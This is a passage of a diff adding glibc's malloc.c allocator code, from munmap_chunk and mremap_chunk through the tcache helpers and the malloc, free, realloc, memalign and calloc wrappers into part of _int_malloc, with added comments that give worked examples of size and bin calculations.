+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compiler's job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (at the moment, at least) so we combine the two values into one before
+     the bit test.  */
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr ("munmap_chunk(): invalid pointer");
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
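+
+/*
+   Tying this back to sysmalloc above: an mmapped chunk created with no
+   front misalignment has prev_size (p) == 0, so block is the chunk
+   itself and total_size equals its size, both page multiples; a chunk
+   that was shifted forward for alignment stores that shift in
+   prev_size, and that is exactly what gets subtracted back off here
+   before the munmap.
+ */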
+
+#if HAVE_MREMAP
+
+static mchunkptr
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+
+  uintptr_t block = (uintptr_t) p - offset;
+  uintptr_t mem = (uintptr_t) chunk2mem(p);
+  size_t total_size = offset + size;
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr("mremap_chunk(): invalid pointer");
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (total_size == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) block, total_size, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+  /* This field exists to detect double frees.  */
+  struct tcache_perthread_struct *key;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time); this is for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  uint16_t counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
+
+static __thread bool tcache_shutting_down = false;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static __always_inline void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+
+  /* Mark this chunk as "in the tcache" so the test in _int_free will
+     detect a double free.  */
+  e->key = tcache;
+
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there's
+   available chunks to remove.  */
+static __always_inline void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  e->key = NULL;
+  return (void *) e;
+}
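+
+/*
+   Illustration (assuming a typical 64-bit build with MALLOC_ALIGNMENT
+   == 16 and MINSIZE == 0x20): chunks of size 0x20 map to tcache bin 0,
+   0x30 to bin 1, and so on in 0x10 steps.  Because tcache_put pushes
+   at the head and tcache_get pops from the head, each bin is a LIFO
+   singly linked list:
+
+     tcache_put (c1, idx);     entries[idx]: c1
+     tcache_put (c2, idx);     entries[idx]: c2 -> c1
+     tcache_get (idx);         returns c2;   entries[idx]: c1
+
+   tcache_get also clears e->key, so the double-free test that
+   tcache_put sets up no longer matches once a chunk is live again.
+ */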
+
+static void
+tcache_thread_shutdown (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  /* Disable the tcache and prevent it from being reinitialized.  */
+  tcache = NULL;
+  tcache_shutting_down = true;
+
+  /* Free all of the entries and the tcache itself back to the arena
+     heap for coalescing.  */
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+}
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+# define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else  /* !USE_TCACHE */
+# define MAYBE_INIT_TCACHE()
+
+static void
+tcache_thread_shutdown (void)
+{
+  /* Nothing to do if there is no thread cache.  */
+}
+
+#endif /* !USE_TCACHE  */
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  _Static_assert (PTRDIFF_MAX <= SIZE_MAX / 2,
+                  "PTRDIFF_MAX is not more than half of SIZE_MAX");
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* int_free also calls request2size, be careful to not pad twice.  */
+  size_t tbytes;
+  if (!checked_request2size (bytes, &tbytes))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      && tcache
+      && tcache->counts[tc_idx] > 0)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  if (SINGLE_THREAD_P)
+    {
+      victim = _int_malloc (&main_arena, bytes);
+      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (victim)));
+      return victim;
+    }
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
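+
+/*
+   A short worked example of the fast path above, assuming a typical
+   64-bit build (SIZE_SZ == 8, MALLOC_ALIGNMENT == 16, MINSIZE == 0x20):
+   malloc (24) is padded by checked_request2size to tbytes == 0x20,
+   csize2tidx (0x20) == 0, and if tcache bin 0 is non-empty the chunk
+   is returned by tcache_get without touching any arena.  Only on a
+   miss does the call fall through to arena_get and _int_malloc.
+ */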
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wraps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+      malloc_printerr ("realloc(): invalid pointer");
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+      assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+	      ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+      return newp;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
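+
+  /*
+     Example of the rounding above (illustrative values): with
+     MALLOC_ALIGNMENT == 16, a requested alignment of 48 is not a power
+     of two, so a starts at 32 and doubles once to 64, which is the
+     alignment actually used.
+   */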
+
+  if (SINGLE_THREAD_P)
+    {
+      p = _int_memalign (&main_arena, alignment, bytes);
+      assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (p)));
+
+      return p;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes;
+  /* ALIGN_UP with overflow check.  */
+  if (__glibc_unlikely (__builtin_add_overflow (bytes,
+						pagesize - 1,
+						&rounded_bytes)))
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+  rounded_bytes = rounded_bytes & -(pagesize - 1);
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+  ptrdiff_t bytes;
+
+  if (__glibc_unlikely (__builtin_mul_overflow (n, elem_size, &bytes)))
+    {
+       __set_errno (ENOMEM);
+       return NULL;
+    }
+  sz = bytes;
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  if (SINGLE_THREAD_P)
+    av = &main_arena;
+  else
+    arena_get (av, sz);
+
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (!SINGLE_THREAD_P)
+    {
+      if (mem == 0 && av != NULL)
+	{
+	  LIBC_PROBE (memory_calloc_retry, 1, sz);
+	  av = arena_get_retry (av, sz);
+	  mem = _int_malloc (av, sz);
+	}
+
+      if (av != NULL)
+	__libc_lock_unlock (av->mutex);
+    }
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8-byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
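+
+/*
+   Illustration of the unrolled clear above on a typical 64-bit build
+   (SIZE_SZ == 8): a calloc that ends up with a 0x40-byte chunk has
+   clearsize == 0x38 == 56 bytes, i.e. nclears == 7, so the unrolled
+   branches zero d[0] through d[6]; only for nclears > 9 does the code
+   fall back to memset.
+ */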
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size returns false for request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
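+
+  /*
+     For concreteness (typical 64-bit values: SIZE_SZ == 8,
+     MALLOC_ALIGNMENT == 16, MINSIZE == 0x20), requests of 0 to 24
+     bytes all normalize to nb == 0x20, 25 to 40 bytes to 0x30,
+     41 to 56 bytes to 0x40, and so on in 0x10 steps.
+   */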
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp;
+      victim = *fb;
+
+      if (victim != NULL)
+	{
+	  if (SINGLE_THREAD_P)
+	    *fb = victim->fd;
+	  else
+	    REMOVE_FB (fb, pp, victim);
+	  if (__glibc_likely (victim != NULL))
+	    {
+	      size_t victim_idx = fastbin_index (chunksize (victim));
+	      if (__builtin_expect (victim_idx != idx, 0))
+		malloc_printerr ("malloc(): memory corruption (fast)");
+	      check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	      /* While we're here, if we see other chunks of the same size,
+		 stash them in the tcache.  */
+	      size_t tc_idx = csize2tidx (nb);
+	      if (tcache && tc_idx < mp_.tcache_bins)
+		{
+		  mchunkptr tc_victim;
+
+		  /* While bin not empty and tcache not full, copy chunks.  */
+		  while (tcache->counts[tc_idx] < mp_.tcache_count
+			 && (tc_victim = *fb) != NULL)
+		    {
+		      if (SINGLE_THREAD_P)
+			*fb = tc_victim->fd;
+		      else
+			{
+			  REMOVE_FB (fb, pp, tc_victim);
+			  if (__glibc_unlikely (tc_victim == NULL))
+			    break;
+			}
+		      tcache_put (tc_victim, tc_idx);
+		    }
+		}
+#endif
+	      void *p = chunk2mem (victim);
+	      alloc_perturb (p, bytes);
+	      return p;
+	    }
+	}
+    }
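+
+  /*
+     Net effect of the block above on a fastbin hit: the first chunk of
+     the matching size goes to the caller, and (with the default
+     tcache_count of 7) up to seven more same-sized fastbin chunks are
+     moved into the corresponding tcache bin, so subsequent requests of
+     that size are served from the tcache without reaching this code.
+   */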
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          bck = victim->bk;
+	  if (__glibc_unlikely (bck->fd != victim))
+	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
+          set_inuse_bit_at_offset (victim, nb);
+          bin->bk = bck;
+          bck->fd = bin;
+
+          if (av != &main_arena)
+	    set_non_main_arena (victim);
+          check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs that
+     it is called frequently in otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (atomic_load_relaxed (&av->have_fastchunks))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is exact fit, or, if this a small request, the chunk is remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          size = chunksize (victim);
+          mchunkptr next = chunk_at_offset (victim, size);
+
+          if (__glibc_unlikely (size <= 2 * SIZE_SZ)
+              || __glibc_unlikely (size > av->system_mem))
+            malloc_printerr ("malloc(): invalid size (unsorted)");
+          if (__glibc_unlikely (chunksize_nomask (next) < 2 * SIZE_SZ)
+              || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
+            malloc_printerr ("malloc(): invalid next size (unsorted)");
+          if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
+            malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
+          if (__glibc_unlikely (bck->fd != victim)
+              || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
+            malloc_printerr ("malloc(): unsorted double linked list corrupted");
+          if (__glibc_unlikely (prev_inuse (next)))
+            malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          if (__glibc_unlikely (bck->fd != victim))
+            malloc_printerr ("malloc(): corrupted unsorted chunks 3");
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
